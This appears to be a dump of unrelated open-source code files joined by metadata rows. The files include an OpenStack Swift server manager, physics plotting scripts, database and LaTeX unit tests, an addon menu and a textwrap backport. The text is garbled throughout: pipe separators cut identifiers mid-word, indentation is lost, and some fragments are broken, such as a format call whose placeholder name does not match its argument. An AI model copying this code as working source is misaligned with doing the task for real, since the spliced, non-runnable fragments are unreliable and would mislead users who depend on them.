md_target.write(' **Purpose**: {descr}'.format(name=struct.purpose))
print(' **Purpose**: {descr}'.format(name=struct.purpose))
md_target.write('\n')
print('\n')
md_target.write(' **Structure**:')
print(' **Structure**:')
md_target.write(' ```')
print(' ```')
md_target.write(' {structure}'.format(structure = struct.structure))
print(' {structure}'.format(structure = struct.structure))
md_target.write(' ```')
print(' ```')
md_target.write(' **Information**:')
print(' **Information**:')
md_target.write(' | Field | description |')
print(' | Field | description |')
md_target.write(' |-------|--------------|')
print(' |-------|--------------|')
for key,value in struct.information:
md_target.write(' | {key} | {value} |'.format(key=key, value=value))
print(' | {key} | {value} |'.format(key=key, value=value))
#Out of the loop now
fd.close()
md_target.close() |
garvenshen/zeda-swift | swift/common/manager.py | Python | apache-2.0 | 21,270 | 0.000047 | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import functools
import errno
import os
import resource
import signal
import time
import subprocess
import re
from swift.common.utils import search_tree, remove_file, write_file
SWIFT_DIR = '/etc/swift'
RUN_DIR = '/var/run/swift'
# auth-server has been removed from ALL_SERVERS, start it explicitly
ALL_SERVERS = ['account-auditor', 'account-server', 'container-auditor',
'container-replicator', 'container-server', 'container-sync',
'container-updater', 'object-auditor', 'object-server',
'object-expirer', 'object-replicator', 'object-updater',
'proxy-server', 'account-replicator', 'account-reaper']
MAIN_SERVERS = ['proxy-server', 'account-server', 'container-server',
'object-server']
REST_SERVERS = [s for s in ALL_SERVERS if s not in MAIN_SERVERS]
GRACEFUL_SHUTDOWN_SERVERS = MAIN_SERVERS + ['auth-server']
START_ONCE_SERVERS = REST_SERVERS
# These are servers that match a type (account-*, container-*, object-*) but
# don't use that type-server.conf file and instead use their own.
STANDALONE_SERVERS = ['object-expirer']
KILL_WAIT = 15 # seconds to wait for servers to die (by default)
WARNING_WAIT = 3 # seconds to wait after message that may just be a warning
MAX_DESCRIPTORS = 32768
MAX_MEMORY = (1024 * 1024 * 1024) * 2 # 2 GB
def setup_env():
"""Try to increase resource limits of the OS. Move PYTHON_EGG_CACHE to /tmp
"""
try:
resource.setrlimit(resource.RLIMIT_NOFILE,
(MAX_DESCRIPTORS, MAX_DESCRIPTORS))
resource.setrlimit(resource.RLIMIT_DATA,
(MAX_MEMORY, MAX_MEMORY))
except ValueError:
print _("WARNING: Unable to increase file descriptor limit. "
"Running as non-root?")
os.environ['PYTHON_EGG_CACHE'] = '/tmp'
def command(func):
"""
Decorator to declare which methods are accessible as commands, commands
always return 1 or 0, where 0 should indicate success.
:param func: function to make public
"""
func.publicly_accessible = True
@functools.wraps(func)
def wrapped(*a, **kw):
rv = func(*a, **kw)
return 1 if rv else 0
return wrapped
def watch_server_pids(server_pids, interval=1, **kwargs):
"""Monitor a collection of server pids yeilding back those pids | that
aren't responding to signals.
:param server_pids: a dict, lists of pids [int,...] keyed on
Server objects
"""
statu | s = {}
start = time.time()
end = start + interval
server_pids = dict(server_pids) # make a copy
while True:
for server, pids in server_pids.items():
for pid in pids:
try:
# let pid stop if it wants to
os.waitpid(pid, os.WNOHANG)
except OSError, e:
if e.errno not in (errno.ECHILD, errno.ESRCH):
raise # else no such child/process
# check running pids for server
status[server] = server.get_running_pids(**kwargs)
for pid in pids:
# original pids no longer in running pids!
if pid not in status[server]:
yield server, pid
# update active pids list using running_pids
server_pids[server] = status[server]
if not [p for server, pids in status.items() for p in pids]:
# no more running pids
break
if time.time() > end:
break
else:
time.sleep(0.1)
class UnknownCommandError(Exception):
pass
class Manager():
"""Main class for performing commands on groups of servers.
:param servers: list of server names as strings
"""
def __init__(self, servers, run_dir=RUN_DIR):
server_names = set()
for server in servers:
if server == 'all':
server_names.update(ALL_SERVERS)
elif server == 'main':
server_names.update(MAIN_SERVERS)
elif server == 'rest':
server_names.update(REST_SERVERS)
elif '*' in server:
# convert glob to regex
server_names.update([s for s in ALL_SERVERS if
re.match(server.replace('*', '.*'), s)])
else:
server_names.add(server)
self.servers = set()
for name in server_names:
self.servers.add(Server(name, run_dir))
@command
def status(self, **kwargs):
"""display status of tracked pids for server
"""
status = 0
for server in self.servers:
status += server.status(**kwargs)
return status
@command
def start(self, **kwargs):
"""starts a server
"""
setup_env()
status = 0
for server in self.servers:
server.launch(**kwargs)
if not kwargs.get('daemon', True):
for server in self.servers:
try:
status += server.interact(**kwargs)
except KeyboardInterrupt:
print _('\nuser quit')
self.stop(**kwargs)
break
elif kwargs.get('wait', True):
for server in self.servers:
status += server.wait(**kwargs)
return status
@command
def no_wait(self, **kwargs):
"""spawn server and return immediately
"""
kwargs['wait'] = False
return self.start(**kwargs)
@command
def no_daemon(self, **kwargs):
"""start a server interactively
"""
kwargs['daemon'] = False
return self.start(**kwargs)
@command
def once(self, **kwargs):
"""start server and run one pass on supporting daemons
"""
kwargs['once'] = True
return self.start(**kwargs)
@command
def stop(self, **kwargs):
"""stops a server
"""
server_pids = {}
for server in self.servers:
signaled_pids = server.stop(**kwargs)
if not signaled_pids:
print _('No %s running') % server
else:
server_pids[server] = signaled_pids
# all signaled_pids, i.e. list(itertools.chain(*server_pids.values()))
signaled_pids = [p for server, pids in server_pids.items()
for p in pids]
# keep track of the pids yeiled back as killed for all servers
killed_pids = set()
kill_wait = kwargs.get('kill_wait', KILL_WAIT)
for server, killed_pid in watch_server_pids(server_pids,
interval=kill_wait,
**kwargs):
print _("%s (%s) appears to have stopped") % (server, killed_pid)
killed_pids.add(killed_pid)
if not killed_pids.symmetric_difference(signaled_pids):
# all proccesses have been stopped
return 0
# reached interval n watch_pids w/o killing all servers
for server, pids in server_pids.items():
if not killed_pids.issuperset(pids):
# some pids of this server were not killed
print _('Waited %s seconds for %s to die; giving up') % (
kill_wait, server)
return 1
@command
def shutdown(self, **kwargs):
"""allow current requests to finish on suppo |
SixTrack/SixTrack | test/chebythin6d/cheby_plot_map.py | Python | lgpl-2.1 | 3,183 | 0.051838 | '''
color code of points:
- black: outside R2 or inside R1 (check);
- colored: inside R2 and outside R1 (check);
- magenta: outside R2 or inside R1 (check) but wronlgy labelled as inside;
- white: inside R2 and outside R1 (check) but wronlgy labelled as outside;
'''
import matplotlib.pyplot as plt
import numpy as np
chebyNames=['cheby1','cheby2','cheby3','cheby4']
coords=['local','map']
offx=[0,-2, 1,0]
offy=[0, 2,-1,0]
R1=[0.25,0.7,0.0,0.5] # [mm]
R2=[3.2,3.2,3.0,3.2] #[mm]
cAngles=np.deg2rad([0,0,-90,160])# [deg to rad]
nRows=nCols=round(len(chebyNames)/2.)
epsilon=1E-15
gteps=1+epsilon
lteps=1-epsilon
pc=450E3 # [MeV]
clight=2.99792458E8 # [m/s]
mass=0.938272310E3 # [MeV/c2]
Brho=pc/(clight*1E-6) # [Tm]
betaRel=np.sqrt(1-1/(1+(pc/mass)**2))
plt.figure('cheby_map',figsize=(20,10))
for jj in range(len(chebyNames)):
mapIn = | np.loadtxt('cheby%s_pot.dat'%(jj+1))
ids_in=np.where(mapIn[:,5]!=0)[0] # flagged as in by 6T
ids_out=np.where(mapIn[:,5]==0)[0] # flagged as out by 6T
xx=mapIn[:,0]-offx[jj]
yy=mapIn[:,1]-offy[jj]
angles=np.arctan2(yy,xx)-cAngles[jj]
rr=np.sqrt(xx**2+yy**2)
xx=rr*np.cos(angles)
yy=rr*np.sin(angles)
xx=np.absolute(xx)
yy=np.absolute(yy)
idc_out=np.where( np.logical_or( np.logical_and(xx<R1[jj]*lteps,yy<R1[jj]*lteps), np.logical_or(xx>R2[jj]*gteps,yy>R2[jj | ]*gteps) )) [0]
idc_in =np.where(np.logical_not( np.logical_or( np.logical_and(xx<R1[jj]*lteps,yy<R1[jj]*lteps), np.logical_or(xx>R2[jj]*gteps,yy>R2[jj]*gteps) )))[0]
for ii in range(len(coords)):
plt.subplot(nRows,nCols*len(coords),ii+jj*len(coords)+1)
# points outside domain (black)
plt.scatter(mapIn[:,0+ii*2][idc_out],mapIn[:,1+ii*2][idc_out],c='k',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
# non-zero kicks at points outside domain (magenta)
if ( len(idc_out)!=0 ):
idrr=np.where(mapIn[:,5][idc_out]!=0)[0]
if (len(idrr)>0):
print ' in map of lens %s there are some points wrongly identified as belonging to domain defined by radii [%g,%g] when they are not... '%(chebyNames[jj],R1[jj],R2[jj])
plt.scatter(mapIn[:,0+ii*2][idc_out][idrr],mapIn[:,1+ii*2][idc_out][idrr],c='m',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
# zero kicks at points inside domain (white)
if ( len(idc_in)!=0 ):
idrr=np.where(mapIn[:,5][idc_in]==0)[0]
if (len(idrr)>0):
print ' in map of lens %s there are some points wrongly identified as outside domain defined by ref radii [%g,%g] when they are not... '%(chebyNames[jj],R1[jj],R2[jj])
plt.scatter(mapIn[:,0+ii*2][idc_in][idrr],mapIn[:,1+ii*2][idc_in][idrr],c='w',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
idrr=np.where(mapIn[:,5][idc_in]!=0)[0]
# points inside domain (colored)
plt.scatter(mapIn[:,0+ii*2][idc_in][idrr],mapIn[:,1+ii*2][idc_in][idrr],c=mapIn[:,4][idc_in][idrr],edgecolors='none')#, vmin=-3E-11, vmax=3E11)
plt.xlabel('x [mm]')
plt.ylabel('y [mm]')
plt.axis('equal')
# plt.legend(loc='best',fontsize=10)
plt.tight_layout()
plt.colorbar()
plt.grid()
plt.clim(-190,-130)
plt.title('%s - %s ref sys [V m]'%(chebyNames[jj],coords[ii]))
plt.show()
|
openstack/sahara | sahara/tests/unit/service/edp/data_sources/base_test.py | Python | apache-2.0 | 2,415 | 0.00207 | # Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from oslo_utils import uuidutils
from sahara.service.edp.data_sourc | es.base import DataSourceType
import testtools
class DataSourceBaseTestCase(testtools.TestCase):
def setUp(self):
super(DataSourceBaseTestCase, self).setUp()
self.ds_base = DataSourceType()
def test_construct_url_no_placeholders(self):
base_url = "swift://container/in | put"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertEqual(base_url, url)
def test_construct_url_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertEqual(
"swift://container/input." + job_exec_id + ".out", url)
def test_construct_url_randstr_placeholder(self):
base_url = "swift://container/input.%RANDSTR(4)%.%RANDSTR(7)%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertRegex(
url, "swift://container/input\.[a-z]{4}\.[a-z]{7}\.out")
def test_construct_url_randstr_and_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.%RANDSTR(7)%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertRegex(
url, "swift://container/input." + job_exec_id + "\.[a-z]{7}\.out")
def test_get_urls(self):
url = 'test://url'
cluster = mock.Mock()
job_exec_id = 'test_id'
self.assertEqual((url, url), self.ds_base.get_urls(url,
cluster, job_exec_id))
|
akhavr/OpenBazaar | tests/test_db_store.py | Python | mit | 5,980 | 0.000502 | import os
import tempfile
import unittest
from node import db_store, setup_db
class TestDbOperations(unittest.TestCase):
"""Test DB operations in an unencrypted DB."""
disable_sqlite_crypt = True
@classmethod
def setup_path(cls):
cls.db_dir = tempfile.mkdtemp()
cls.db_path = os.path.join(cls.db_dir, 'testdb.db')
@classmethod
def setup_db(cls):
setup_db.setup_db(
cls.db_path,
disable_sqlite_crypt=cls.disable_sqlite_crypt
)
@classmethod
def setUpClass(cls):
cls.setup_path()
cls.setup_db()
@classmethod
def tearDownClass(cls):
os.remove(cls.db_path)
os.rmdir(cls.db_dir)
def setUp(self):
self.db = db_sto | re.Obdb(
self.db_path,
disable_sqlite_crypt=self.disable_sqlite_crypt
)
def test_insert_select_operations(self):
# Cre | ate a dictionary of a random review
review_to_store = {"pubKey": "123",
"subject": "A review",
"signature": "a signature",
"text": "Very happy to be a customer.",
"rating": 10}
# Use the insert operation to add it to the db
self.db.insert_entry("reviews", review_to_store)
# Try to retrieve the record we just added based on the pubkey
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})
# The above statement will return a list with all the
# retrieved records as dictionaries
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
# Is the retrieved record the same as the one we added before?
self.assertEqual(
review_to_store["pubKey"],
retrieved_review["pubKey"],
)
self.assertEqual(
review_to_store["subject"],
retrieved_review["subject"],
)
self.assertEqual(
review_to_store["signature"],
retrieved_review["signature"],
)
self.assertEqual(
review_to_store["text"],
retrieved_review["text"],
)
self.assertEqual(
review_to_store["rating"],
retrieved_review["rating"],
)
# Let's do it again with a malicious review.
review_to_store = {"pubKey": "321",
"subject": "Devil''''s review",
"signature": "quotes\"\"\"\'\'\'",
"text": 'Very """"happy"""""" to be a customer.',
"rating": 10}
# Use the insert operation to add it to the db
self.db.insert_entry("reviews", review_to_store)
# Try to retrieve the record we just added based on the pubkey
retrieved_review = self.db.select_entries("reviews", {"pubkey": "321"})
# The above statement will return a list with all the
# retrieved records as dictionaries
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
# Is the retrieved record the same as the one we added before?
self.assertEqual(
review_to_store["pubKey"],
retrieved_review["pubKey"],
)
self.assertEqual(
review_to_store["subject"],
retrieved_review["subject"],
)
self.assertEqual(
review_to_store["signature"],
retrieved_review["signature"],
)
self.assertEqual(
review_to_store["text"],
retrieved_review["text"],
)
self.assertEqual(
review_to_store["rating"],
retrieved_review["rating"],
)
# By ommiting the second parameter, we are retrieving all reviews
all_reviews = self.db.select_entries("reviews")
self.assertEqual(len(all_reviews), 2)
# Use the <> operator. This should return the review with pubKey 123.
retrieved_review = self.db.select_entries(
"reviews",
{"pubkey": {"value": "321", "sign": "<>"}}
)
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
self.assertEqual(
retrieved_review["pubKey"],
"123"
)
def test_get_or_create_record_when_not_exists(self):
record = {"city": "Zurich"}
table = "settings"
retrieved_record = self.db.get_or_create(table, record)
self.assertEqual(retrieved_record["city"], record["city"])
# check that the missing fields were created as empty
self.assertEqual(retrieved_record["countryCode"], "")
def test_update_operation(self):
# Retrieve the record with pubkey equal to '123'
retrieved_review = self.db.select_entries("reviews", {"pubkey": "321"})[0]
# Check that the rating is still '10' as expected
self.assertEqual(retrieved_review["rating"], 10)
# Update the record with pubkey equal to '123'
# and lower its rating to 9
self.db.update_entries("reviews", {"rating": 9}, {"pubkey": "123"})
# Retrieve the same record again
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})[0]
# Test that the rating has been updated succesfully
self.assertEqual(retrieved_review["rating"], 9)
def test_delete_operation(self):
# Delete the entry with pubkey equal to '123'
self.db.delete_entries("reviews", {"pubkey": "123"})
# Looking for this record with will bring nothing
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})
self.assertEqual(len(retrieved_review), 0)
class TestCryptDbOperations(TestDbOperations):
"""Test DB operations in an encrypted DB."""
disable_sqlite_crypt = False
if __name__ == '__main__':
unittest.main()
|
rigetticomputing/pyquil | pyquil/latex/tests/test_latex.py | Python | apache-2.0 | 4,016 | 0.001245 | import pytest
from pyquil.quil import Program, Pragma
from pyquil.quilbase import Declare, Measurement, JumpTarget, Jump
from pyquil.quilatom import MemoryReference, Label
from pyquil.gates import H, X, Y, RX, CZ, SWAP, MEASURE, CNOT, WAIT, MOVE
from pyquil.latex import to_latex, DiagramSettings
from pyquil.latex._diagram import split_on_terminal_measures
def test_to_latex():
"""A test to give full coverage of latex_generation."""
p = Program()
p.inst(
X(0),
RX(1.0, 5),
Y(0),
CZ(0, 2),
SWAP(0, 1),
MEASURE(0, None),
CNOT(2, 0),
X(0).controlled(1),
Y(0).dagger(),
)
_ = to_latex(p)
# Modify settings to access non-standard control paths.
settings = DiagramSettings(impute_missing_qubits=True)
_ = to_latex(p, settings)
settings = DiagramSettings(abbreviate_controlled_rotations=True)
_ = to_latex(p, settings)
settings = DiagramSettings(label_qubit_lines=False)
_ = to_latex(p, settings)
def test_fail_on_forked():
"""Check that to_latex raises an exception on FORKED gates."""
p = Program()
p.inst(RX(1.0, 0).forked(1, | [2.0]))
with pytest.raises(ValueError):
_ = to_latex(p)
def test_gate_group_pragma():
"Check that to_lat | ex does not fail on LATEX_GATE_GROUP pragma."
p = Program()
p.inst(Pragma("LATEX_GATE_GROUP", [], "foo"), X(0), X(0), Pragma("END_LATEX_GATE_GROUP"), X(1))
_ = to_latex(p)
def test_fail_on_bad_pragmas():
"Check that to_latex raises an error when pragmas are imbalanced."
# missing END_LATEX_GATE_GROUP
with pytest.raises(ValueError):
_ = to_latex(Program(Pragma("LATEX_GATE_GROUP", [], "foo"), X(0)))
# missing LATEX_GATE_GROUP
with pytest.raises(ValueError):
_ = to_latex(Program(X(0), Pragma("END_LATEX_GATE_GROUP")))
# nested groups are not currently supported
with pytest.raises(ValueError):
_ = to_latex(
Program(
Pragma("LATEX_GATE_GROUP"),
X(0),
Pragma("LATEX_GATE_GROUP"),
X(1),
Pragma("END_LATEX_GATE_GROUP"),
Pragma("END_LATEX_GATE_GROUP"),
)
)
def test_warn_on_pragma_with_trailing_measures():
"Check that to_latex warns when measurement alignment conflicts with gate group pragma."
with pytest.warns(UserWarning):
_ = to_latex(
Program(
Declare("ro", "BIT"),
Pragma("LATEX_GATE_GROUP"),
MEASURE(0, MemoryReference("ro")),
Pragma("END_LATEX_GATE_GROUP"),
MEASURE(1, MemoryReference("ro")),
)
)
def test_split_measures():
"""Check that we can split terminal measurements."""
prog = Program(
Declare("ro", "BIT"),
X(0),
MEASURE(0, MemoryReference("ro")),
X(1),
MEASURE(1, MemoryReference("ro")),
)
meas, instr = split_on_terminal_measures(prog)
assert len(meas) == 2
assert len(instr) == 3
assert all(isinstance(instr, Measurement) for instr in meas)
def test_unsupported_ops():
target = Label("target")
base_prog = Program(
Declare("reg1", "BIT"), Declare("reg2", "BIT"), H(0), JumpTarget(target), CNOT(0, 1)
)
bad_ops = [WAIT, Jump(target), MOVE(MemoryReference("reg1"), MemoryReference("reg2"))]
assert to_latex(base_prog)
for op in bad_ops:
prog = base_prog + op
with pytest.raises(ValueError):
_ = to_latex(prog)
def test_controlled_gate():
prog = Program(H(2).controlled(3))
# This is hardcoded, but better than nothing
expected = r"""
\begin{tikzcd}
\lstick{\ket{q_{2}}} & \gate{H} & \qw \\
\lstick{\ket{q_{3}}} & \ctrl{-1} & \qw
\end{tikzcd}
""".strip().split()
actual = to_latex(prog).split()
start_idx = actual.index("\\begin{tikzcd}")
assert expected == actual[start_idx : start_idx + len(expected)]
|
mitschabaude/nanopores | scripts/pughpore/new_sobol_points.py | Python | mit | 6,272 | 0.064413 | import sys
from math import sqrt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
#from numpy.random import random
import matplotlib.pyplot as plt
from folders import fields
import nanopores.geometries.pughpore as pughpore
import nanopores
from sobol.sobol_seq import i4_sobol_generate as sobol
up = nanopores.user_params(pughpore.params, k=3)
R = up.R
H = up.H
l0 = up.l0
l1 = up.l1
l2 = up.l2
l3 = up.l3
l4 = up.l4
hpore = up.hpore
hmem = up.hmem
h2 = up.h2
h1 = up.h1
h4 = up.h4
rMolecule = up.rMolecule
eps = 0.1
r = rMolecule + eps
p0=hpore/2.
p1=p0-h1
p2=p0-h2
p3=-hpore/2.
def fac(z):
if z>=p3 and z<=p2:
return l3/2.-r
elif z>p2 and z<p2+r:
x=z-p2
return -sqrt(r**2-x**2)+l3/2.
elif z>=p2+r and z<=p1:
return l2/2.-r
elif z>p1 and z<p1+r:
x=z-p1
return -sqrt(r**2-x**2)+l2/2.
elif z>=p1+r and z<=p0:
return l0/2.-r
elif z>p0 and z<p0+r:
x=z-p0
return -sqrt(r**2-x**2)+l0/2.
elif z<p3 and z>p3-r:
x=z-p3
return -sqrt(r**2-x**2)+l3/2.
else: return R/2.
k0=3
n=5
#k=up.k
k=0
z=sobol(1,2**n,0)[0]
z=(hpore+30.)*z-hpore/2.-10.
factors=np.array([fac(x) for x in z])
#def R_(z):
# if z>=p3 and z<=p2:
# return l3/2.
# elif z>=p2 and z<=p1:
# return l2/2.
# elif z>=p1 and z<=p0:
# return l0/2.
# else: return R/2.
#
#X=np.linspace(-H/2.,H/2.,800)
#Y=np.array([fac(X[i]) for i in range(X.shape[0])])
#plt.plot(X,Y)
#plt.plot(X,np.array([R_(X[i]) for i in range(X.shape[0])]),color='r')
#plt.scatter(z,np.zeros(2**n))
#plt.scatter(z,factors)
#plt.show()
XY = sobol(2,2**k0,0)
X_points,Y_points = XY[0],XY[1]
for i in range(k+1): # additional points
XY = sobol(2,2**(i+k0),2**(i+k0))
X_points = np.append(X_points,XY[0])
Y_points = np.append(Y_points,XY[1])
for i in list(reversed(range(X_points.shape[0]))): # cut off other triangle
if Y_points[i]>X_points[i]:
X_points = np.delete(X_points,i)
Y_points = np.delete(Y_points,i)
print '# points in plane = %d\n# z-values =%d\n# totals points= %d'%(
X_points.shape[0],z.shape[0],X_points.shape[0]*z.shape[0])
X, Y, Z = np.array([]), np.array([]), np.array([]) # concatenate all arrays
for j in range(z.shape[0]):
Z_p=np.zeros(X_points.shape[0])+z[j]
X_p = X_points*factors[j]
Y_p = Y_points*factors[j]
X = np.append(X,X_p)
Y = np.append(Y,Y_p)
Z = np.append(Z,Z_p)
array=[[X[i],Y[i],Z[i]] for i in range(X.shape[0])]
if __name__ == "__main__":
fields.save_entries("pughx_new", dict(up), x=array, N=len(array))
fields.update()
def surfx(y1,y2,z1,z2,d,size,rs,cs):
Y = np.linspace(y1,y2,size)
Z = np.linspace(z1,z2,size)
Y, Z = np.meshgrid(Y,Z)
X = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
def surfy(x1,x2,z1,z2,d,size,rs,cs):
X = np.linspace(x1,x2,size)
Z = np.linspace(z1,z2,size)
X, Z = np.meshgrid(X,Z)
Y = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
def surfz(x1,x2,y1,y2,d,size,rs,cs):
X = np.linspace(x1,x2,size)
Y = np.linspace(y1,y2,size)
X, Y = np.meshgrid(X,Y)
Z = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.view_init(elev=0,azim=270)
ax.set_xlim([-.5*R,.5*R])
ax.set_ylim([-.5*R,.5*R])
ax.set_zlim([-.5*H,.5*H])
#ax.set_aspect(1)
size=10
alpha=.1
rs, cs = 1, 1
color='blue'
#front
surfy(-.5*l3,.5*l3,-.5*hpore,.5*hpore-h2,.5*l3,size,1,1)
surfy(-.5*l2,.5*l2,.5*hpore-h2,.5*hpore-h1,.5*l2,size,5,1)
surfy(-.5*l1,.5*l1,.5*hpore-h1,.5*hpore,.5*l1,size,10,1)
surfy(.5*l0,-.5*l0,-.5*hpore+hmem,.5*hpore,.5*l0,size,5,5)
#front-right
surfy(.5*l3,.5*l2,-.5*hpore,.5*hpore-h2,0.,size,5,5)
surfy(.5*l2,.5*l1,-.5*hpore,.5*hpore-h1,0.,size,5,5)
surfy(.5*l1,.5*l0,-.5*hpore+hmem,.5*hpore,0.,size,5,5)
surfy(.5*l4,.5*R,-.5*hpore,-.5*hpore+hmem,0.,size,5,5)
#front-left
surfy(-.5*l3,-.5*l2,-.5*hpore,.5*hpore-h2,0.,size,5,5)
surfy(-.5*l2,-.5*l1,-.5*hpore,.5*hpore-h1,0.,size,5,5)
surfy(-.5*l1,-.5*l0,-.5*hpore+hmem,.5*hpore,0.,size,5,5)
surfy(-.5*l4,-.5*R,-.5*hpore,-.5*hpore+hmem,0.,size,5,5)
#top-front
surfz(-.5*l0,.5*l0,.5*l1,.5*l0,.5*hpore,size,10,1)
surfz(-.5*l1,.5*l1,.5*l2,.5*l1,.5*hpore-h1,size,10,1)
surfz(-.5*l2,.5*l2,.5*l3,.5*l2,.5*hpore-h2,size,10,1)
surfz(-.5*R,.5*R,.5*l0,.5*R,-.5*hpore+hmem,size,5,5)
surfz(-.5*R,.5*R,.5*l0,.5*R,-.5*hpore,size,5,5)
#top-right
surfz(.5*l1,.5*l0,0.,.5*l1,.5*hpore,size,5,5)
surfz(.5*l2,.5*l1,0.,.5*l2,.5*hpore-h1,size,5,5)
surfz(.5*l3,.5*l2,0.,.5*l3,.5*hpore-h2,size,5,5)
surfz(.5*l0,.5*R,0.,.5*l0,-.5*hpore+hmem,size,5,5)
surfz(.5*l0,.5*R,0.,.5*l0,-.5*hpore,size,5,5)
#top-left
surfz(-.5*l1,-.5*l0,0.,.5*l1,.5*hpore,size,5,5)
surfz(-.5*l2,-.5*l1,0.,.5*l2,.5*hpore-h1,size,5,5)
surfz(-.5*l3,-.5*l2,0.,.5*l3,.5*hpore-h2,size,5,5)
surfz(-.5*l0,-.5*R,0.,.5*l0,-.5*hpore+hmem,size,5,5)
surfz(-.5*l0,-.5*R,0.,.5*l0,-.5*hpore,size,5,5)
#right
surfx(0.,.5*l1,.5*hpore-h1,.5*hpore,.5*l1,size,5,5)
surfx(0.,.5*l2,.5*hpore-h2,.5*hpore-h1,.5*l2,size,5,5)
surfx(0.,.5*l3,-.5*hpore,.5*hpore-h2,.5*l3,size,5,5)
surfx(0.,.5*l0,-.5*hpore+hmem,.5*hpore,.5*l0,size,5,5)
#left
surfx(0.,.5*l1,.5*hpore-h1,.5*h | pore,-.5*l1,size,5,5)
surfx(0.,.5*l2,.5*hpore-h2,.5*hpore-h1,-.5*l2,size,5,5)
surfx(0.,.5*l3,-.5*hpore,.5*hpore-h2,-.5*l3,size,5,5)
surfx(0.,.5*l0,-.5*hpore+hmem,.5*hpore,-.5*l0,size,5,5)
ax.scatter(X,Y,Z)
ax.sc | atter(X,-Y,Z)
ax.scatter(-X,Y,Z)
ax.scatter(-X,-Y,Z)
ax.scatter(Y,X,Z)
ax.scatter(Y,-X,Z)
ax.scatter(-Y,X,Z)
ax.scatter(-Y,-X,Z)
plt.tight_layout()
plt.show()
plt.scatter(X_points,Y_points)
plt.plot([0.,1.,1.,0.,0.,1.],[0.,0.,1.,1.,0.,1.],color='blue')
ax=plt.gca()
ax.set_aspect(1)
plt.tight_layout()
plt.show()
|
xbmcmegapack/plugin.video.megapack.dev | resources/lib/menus/home_countries_saint_pierre_and_miquelon.py | Python | gpl-3.0 | 1,147 | 0.00262 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
| the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Genera | l Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Saint_pierre_and_miquelon():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Saint Pierre and Miquelon"])) |
riseml/config-parser | config_parser/sections/deploy.py | Python | mit | 198 | 0.005051 | from .job | s import JobSection
class DeploySection(JobSection):
schema_file = 'deploy.json'
def __init__(self, image, run, **kwargs):
super | (DeploySection, self).__init__(image, run) |
playingaround2017/test123 | gamera/backport/textwrap.py | Python | gpl-2.0 | 13,844 | 0.000939 | """Text wrapping and filling.
"""
# Copyright (C) 1999-2001 Gregory P. Ward.
# Copyright (C) 2002, 2003 Python Software Foundation.
# Written by Greg Ward <gward@python.net>
__revision__ = "$Id$"
import string, re
# Do the right thing with boolean values for all known Python versions
# (so this module can be copied to projects that don't depend on Python
# 2.3, e.g. Optik and Docutils).
try:
True, False
except NameError:
(True, False) = (1, 0)
__all__ = ['TextWrapper', 'wrap', 'fill']
# Hardcode the recognized whitespace characters to the US-ASCII
# whitespace characters. The main reason for doing this is that in
# ISO-8859-1, 0xa0 is non-breaking whitespace, so in certain locales
# that character winds up in string.whitespace. Respecting
# string.whitespace in those cases would 1) make textwrap treat 0xa0 the
# same as any other whitespace char, which is clearly wrong (it's a
# *non-breaking* space), 2) possibly cause problems with Unicode,
# since 0xa0 is not in range(128).
_whitespace = '\t\n\x0b\x0c\r '
class TextWrapper:
"""
Object for wrapping/filling text. The public interface consists of
the wrap() and fill() methods; the other methods are just there for
subclasses to override in order to tweak the default behaviour.
If you want to completely replace the main wrapping algorithm,
you'll probably have to override _wrap_chunks().
Several instance attributes control various aspects of wrapping:
width (default: 70)
